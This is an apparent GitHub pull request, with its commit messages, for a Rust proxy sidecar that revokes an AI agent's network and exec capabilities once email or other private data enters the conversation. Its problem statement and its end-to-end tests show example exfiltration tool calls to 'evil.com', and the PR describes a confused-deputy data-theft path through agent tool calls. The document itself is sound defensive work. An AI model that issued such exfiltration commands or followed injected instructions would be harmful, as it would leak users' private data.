feat(capability-ratchet): add Rust capability ratchet sidecar #3

Open
ericksoa wants to merge 6 commits into NVIDIA:main from ericksoa:feat/capability-ratchet-rust

ericksoa commented Mar 4, 2026

Problem

OpenShell already enforces strong perimeter security — Landlock filesystem isolation, process sandboxing, and network policies that restrict which binaries can reach which endpoints. These controls are effective at containing agents at the OS level.

However, perimeter controls alone can't reason about what data is in the agent's context at inference time. An agent that reads private data (email, calendar) and then asks the LLM for a tool call like curl http://evil.com/exfil?data=... would pass OpenShell's network policy as long as curl is an allowed binary. The exfiltration happens through the LLM's reasoning, not through a direct syscall bypass.

This is the confused deputy attack vector for agentic systems — and it requires a defense layer that operates at the inference request level, complementing OpenShell's existing OS-level controls.

Solution

A Capability Ratchet sidecar — a per-request, stateless HTTP proxy that adds defense-in-depth by sitting between the OpenShell sandbox proxy and the inference backend. It analyzes each request/response pair and blocks or rewrites tool calls that would violate the ratchet policy.

The ratchet is "one-way": once private or untrusted data enters the context, certain capabilities (network egress, arbitrary exec, irreversible exec) are revoked for that request. The agent can ask the user to approve blocked actions via the X-Ratchet-Approve header.

This complements OpenShell's existing protections — OpenShell handles the perimeter, the ratchet handles context-aware capability restriction.
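The one-way behaviour described above can be sketched as a pure function from taint flags to forbidden capabilities. This is a minimal illustration, not the contents of revocation.rs: the type and function names are hypothetical, and only the `HasPrivateData` → `NetworkEgress` row is stated in this PR (see Test 2). The `HasUntrustedInput` row is an assumption made for the example.

```rust
use std::collections::BTreeSet;

/// Taint flags named in the PR description.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum TaintFlag {
    HasPrivateData,
    HasUntrustedInput,
}

/// Capabilities the ratchet can revoke.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum Capability {
    NetworkEgress,
    ArbitraryExec,
    IrreversibleExec,
}

/// Capabilities forbidden by a single taint flag.
/// Only the `HasPrivateData` row comes from the PR text; the
/// `HasUntrustedInput` row is an illustrative assumption.
fn forbidden_by(flag: TaintFlag) -> &'static [Capability] {
    match flag {
        TaintFlag::HasPrivateData => &[Capability::NetworkEgress],
        TaintFlag::HasUntrustedInput => {
            &[Capability::ArbitraryExec, Capability::IrreversibleExec]
        }
    }
}

/// Union of everything forbidden by the taint present in one request.
/// Adding a flag can only grow the result, never shrink it.
pub fn forbidden_capabilities(taint: &BTreeSet<TaintFlag>) -> BTreeSet<Capability> {
    taint
        .iter()
        .flat_map(|flag| forbidden_by(*flag).iter().copied())
        .collect()
}
```

Because the result is a set union, a request with more taint never has fewer forbidden capabilities than one with less, which is the property the word "ratchet" refers to.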

Architecture

[Figure: Capability Ratchet Architecture]

End-to-End Test

The sidecar was verified end-to-end in Docker (colima) with three scenarios:

Build

docker build --build-arg BASE_IMAGE=openshell-base -t openshell-ratchet .

Test Setup

A container runs: bash-ast server → mock Python HTTP backend (port 9999) → Rust sidecar (port 4001). The mock backend returns a curl http://evil.com/exfil tool call whenever tool results are present in the request.

Test 1: Clean request passes through

curl -s http://127.0.0.1:4001/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"test","messages":[{"role":"user","content":"hello"}]}'
# → {"choices":[{"message":{"role":"assistant","content":"Hello!"},...}]}

No taint detected → request and response pass through unmodified.

Test 2: Tainted request blocks exfiltration

curl -s http://127.0.0.1:4001/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"test","messages":[
    {"role":"assistant","tool_calls":[{"id":"tc1","type":"function",
      "function":{"name":"read_email","arguments":"{}"}}]},
    {"role":"tool","tool_call_id":"tc1",
      "content":"From: boss@corp.com\nSubject: Confidential Q3 numbers"}
  ]}'
# → Response rewritten: tool call blocked, ratchet_metadata with approve instructions

The read_email tool produces has-private-data taint (per policy) → network:egress is forbidden → the LLM's curl tool call is blocked. The response includes ratchet_metadata.approve_value: "tc99" so the agent can ask the user for approval.
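The taint step in Test 2 could look roughly like the sketch below: walk the messages, remember which tool issued each tool call ID, and collect the taint flags the policy declares for any tool whose result appears. The `Message` enum and the `policy` map are simplified, hypothetical stand-ins; the sidecar itself works on `serde_json::Value` and its actual logic in taint.rs may differ.

```rust
use std::collections::{BTreeSet, HashMap};

#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum TaintFlag {
    HasPrivateData,
    HasUntrustedInput,
}

/// Simplified stand-in for a normalized chat message (hypothetical type).
pub enum Message {
    /// Assistant turn that issued tool calls: (tool_call_id, tool name).
    AssistantToolCalls(Vec<(String, String)>),
    /// Tool result that refers back to a tool call ID.
    ToolResult { tool_call_id: String },
    /// Any other message (user, system, plain assistant text).
    Other,
}

/// Collect taint for one request from the tool results it contains.
/// `policy` maps a tool name to the taint flags its output carries.
pub fn detect_taint(
    messages: &[Message],
    policy: &HashMap<String, BTreeSet<TaintFlag>>,
) -> BTreeSet<TaintFlag> {
    let mut id_to_tool: HashMap<&str, &str> = HashMap::new();
    let mut taint = BTreeSet::new();
    for msg in messages {
        match msg {
            Message::AssistantToolCalls(calls) => {
                for (id, name) in calls {
                    id_to_tool.insert(id.as_str(), name.as_str());
                }
            }
            Message::ToolResult { tool_call_id } => {
                // Results whose originating tool is unknown or not in the
                // policy add no taint in this sketch.
                let flags = id_to_tool
                    .get(tool_call_id.as_str())
                    .and_then(|name| policy.get(*name));
                if let Some(flags) = flags {
                    taint.extend(flags.iter().copied());
                }
            }
            Message::Other => {}
        }
    }
    taint
}
```

With a policy entry mapping `read_email` to `HasPrivateData`, the two messages from Test 2 yield a taint set containing only `HasPrivateData`, while the single user message from Test 1 yields an empty set.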

Test 3: User-approved request passes through

curl -s http://127.0.0.1:4001/v1/chat/completions \
  -H "Content-Type: application/json" \
  -H "X-Ratchet-Approve: tc99" \
  -d '{"model":"test","messages":[...same tainted messages...]}'
# → {"choices":[{"message":{"tool_calls":[{"function":{"name":"bash",
#     "arguments":"{\"command\":\"curl http://evil.com/exfil\"}"}}],...}}]}

X-Ratchet-Approve: tc99 header → tool call tc99 bypasses analysis → original response returned.
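A minimal sketch of how the approval header might be turned into a set of approved tool call IDs follows. The function names are hypothetical, and accepting a comma-separated list is an assumption; the PR only shows a single ID in the header.

```rust
use std::collections::BTreeSet;

/// Parse the value of `X-Ratchet-Approve` into approved tool call IDs.
/// Comma-separated input is an assumption made for this sketch.
pub fn parse_approvals(header_value: Option<&str>) -> BTreeSet<String> {
    header_value
        .unwrap_or("")
        .split(',')
        .map(str::trim)
        .filter(|id| !id.is_empty())
        .map(str::to_owned)
        .collect()
}

/// A blocked tool call is released only if its exact ID was approved.
pub fn is_approved(approved: &BTreeSet<String>, tool_call_id: &str) -> bool {
    approved.contains(tool_call_id)
}
```

Matching on the exact ID keeps an approval scoped to the specific blocked call (here `tc99`) instead of switching analysis off for the whole request.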

Contributor Notes

Tech Stack

Chosen to match OpenShell core: Axum 0.8, Tokio 1.43, Reqwest 0.12 (rustls), serde, tracing (JSON), Clap 4.5. Edition 2024, rust-version 1.88. Clippy pedantic + nursery.

Module Map

| Module | Purpose | Lines |
|---|---|---|
| types.rs | TaintFlag, Capability, Reversibility, ToolCall enums/structs | 120 |
| constants.rs | SHELLS, NETWORK_COMMANDS, INTERPRETER_COMMANDS, NETWORK_CODE_INDICATORS | 70 |
| known_safe.rs | 140+ built-in safe commands (from analysis of ~25k real agent sessions) | 64 |
| revocation.rs | 2×2 taint→forbidden capability matrix | 34 |
| reversibility.rs | AST command classification (git, docker, kubectl, interpreters, SQL) | 510 |
| config.rs | SidecarConfig from YAML + env var resolution | 118 |
| policy.rs | 4-step resolution: tools[cmd subcmd] → tools[cmd] → knownSafe → unknown | 281 |
| normalize.rs | Chat Completions / Anthropic / Responses API normalization (enum dispatch) | 607 |
| bash_ast.rs | NDJSON Unix socket client for bash-ast server | 143 |
| bash_unwrap.rs | Recursive bash -c unwrapping via BoxFuture (max depth 5) | 351 |
| sandbox.rs | unshare --net / sandbox-exec AST rewriting | 144 |
| taint.rs | Per-request taint detection with shlex fallback | 196 |
| tool_analysis.rs | Full analysis pipeline: capabilities, reversibility, URL extraction, sandboxing | 381 |
| proxy.rs | Reqwest forwarding to backend (forces stream: false) | 60 |
| server.rs | Axum router, approval parsing, response rewriting | 417 |
| main.rs | Clap CLI, tracing init, startup | 124 |
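The 4-step resolution order listed for policy.rs can be sketched as a chain of lookups from most to least specific. The names here are hypothetical and the policy rule is reduced to a placeholder string; the real rule type and lookup details in policy.rs are not shown in this PR.

```rust
use std::collections::{HashMap, HashSet};

/// Outcome of resolving a command against the policy (hypothetical type).
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum Resolution<'a> {
    /// Matched a `tools["cmd subcmd"]` entry.
    Subcommand(&'a str),
    /// Matched a `tools["cmd"]` entry.
    Command(&'a str),
    /// Not in the policy, but on the built-in known-safe list.
    KnownSafe,
    /// No match anywhere.
    Unknown,
}

/// Resolve a command in the documented order:
/// tools[cmd subcmd], then tools[cmd], then knownSafe, then unknown.
pub fn resolve<'a>(
    tools: &'a HashMap<String, String>,
    known_safe: &HashSet<&str>,
    cmd: &str,
    subcmd: Option<&str>,
) -> Resolution<'a> {
    if let Some(sub) = subcmd {
        if let Some(rule) = tools.get(&format!("{cmd} {sub}")) {
            return Resolution::Subcommand(rule.as_str());
        }
    }
    if let Some(rule) = tools.get(cmd) {
        return Resolution::Command(rule.as_str());
    }
    if known_safe.contains(cmd) {
        return Resolution::KnownSafe;
    }
    Resolution::Unknown
}
```

Checking the most specific key first lets a policy treat `git push` differently from other `git` subcommands, while commands that appear nowhere fall through to `Unknown` so the caller can handle them conservatively.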

Key Design Decisions

  • Single crate (not workspace): ~3,500 lines total — workspace adds complexity for zero benefit
  • serde_json::Value throughout: The sidecar is format-agnostic and forward-compatible. Defining request/response structs would create rigidity.
  • Enum dispatch for normalize: All three format variants known at compile time. No vtable overhead.
  • BTreeSet for taint/capability sets: Deterministic ordering in logs and tests
  • Shared AppState via Arc: Standard Axum pattern for config + policy + HTTP client + bash-ast client
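To illustrate the enum-dispatch decision above, the sketch below models the three formats as a plain enum and branches with `match` rather than a trait object. It is not the code in normalize.rs: the method names are hypothetical, and selecting the format from the upstream request path is an assumption made for the example.

```rust
/// The three request formats named in the PR.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ApiFormat {
    ChatCompletions,
    Anthropic,
    Responses,
}

impl ApiFormat {
    /// Guess the format from a request path (assumed detection rule).
    pub fn from_path(path: &str) -> Option<Self> {
        match path {
            "/v1/chat/completions" => Some(Self::ChatCompletions),
            "/v1/messages" => Some(Self::Anthropic),
            "/v1/responses" => Some(Self::Responses),
            _ => None,
        }
    }

    /// Top-level request field that carries the conversation.
    /// The compiler checks that every variant is handled here.
    pub fn conversation_field(self) -> &'static str {
        match self {
            Self::ChatCompletions | Self::Anthropic => "messages",
            Self::Responses => "input",
        }
    }
}
```

Since all variants are known at compile time, adding a fourth format would make each non-exhaustive `match` a compile error until it is handled, which a `dyn Trait` design would not give for free.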

Testing

cargo test          # 44 unit + integration tests
cargo clippy        # pedantic + nursery (warnings only, no errors)

Docker

docker build --build-arg BASE_IMAGE=openshell-base -t openshell-ratchet .

Multi-stage build: rust:1.88-bookworm builder → base sandbox image. Single static binary at /usr/local/bin/capability-ratchet-sidecar.

Config Files (unchanged from prototype)

  • ratchet-config.yaml — upstream URL, API key env var, listen addr, bash-ast socket, shadow mode
  • ratchet-policy.yaml — tool taint declarations, capability requirements, approved endpoints
  • policy.yaml — OpenShell network policy (filesystem, process, network ACLs)

🤖 Generated with Claude Code

Add a per-request, stateless HTTP proxy sidecar that prevents AI agent
data exfiltration by dynamically revoking capabilities when private or
untrusted data enters the conversation context.

Implementation:
- Axum 0.8 HTTP server: /v1/chat/completions proxy + /health endpoint
- Taint detection from tool results (has-private-data, has-untrusted-input)
- 2x2 revocation matrix mapping taint flags to forbidden capabilities
- Three API format normalizers: Chat Completions, Anthropic, Responses API
- bash-ast Unix socket client for AST-based command analysis
- Recursive bash -c unwrapping with shlex fallback
- OS-level sandbox rewriting (unshare --net / sandbox-exec)
- Tool analysis pipeline: capability detection, reversibility, URL extraction
- User approval flow via X-Ratchet-Approve header
- Shadow mode for log-only deployment
- Multi-stage Docker build producing a single static binary
- 44 unit and integration tests

Tech stack matches NemoClaw core: Axum, Tokio, Reqwest, serde, tracing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Aaron Erickson <aerickson@nvidia.com>
ericksoa and others added 5 commits March 13, 2026 07:15
Update all references across the repo from the old NemoClaw branding
to OpenShell, including Docker image names, CLI commands, config files,
documentation, and source code comments.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Fix all 38 clippy pedantic/nursery warnings (manual_let_else,
  missing_errors_doc, option_if_let_else, or_fun_call, too_many_lines,
  significant_drop_tightening, iter_on_single_items, unnecessary_wraps,
  type_complexity, needless_continue, missing_panics_doc, etc.)
- Run cargo fmt across all source files
- Fix shellcheck SC2034 warning (unused loop variable in ratchet-start.sh)
- Fix grammar: "A OpenShell" → "An OpenShell" in README
- Add #[allow(dead_code)] to unused test helper sample_config()
- Extract helpers to reduce function line counts (server.rs, normalize.rs)
- Use static defaults to avoid or_fun_call with temporary references

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Only force stream:false on tainted requests (non-tainted pass through)
- Add force_non_streaming parameter to forward_to_backend
- Add X-Ratchet-Stream-Blocked response header when streaming is disabled
- Document why the ratchet exists vs Docker --network=none
- Add honest Limitations section to README

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>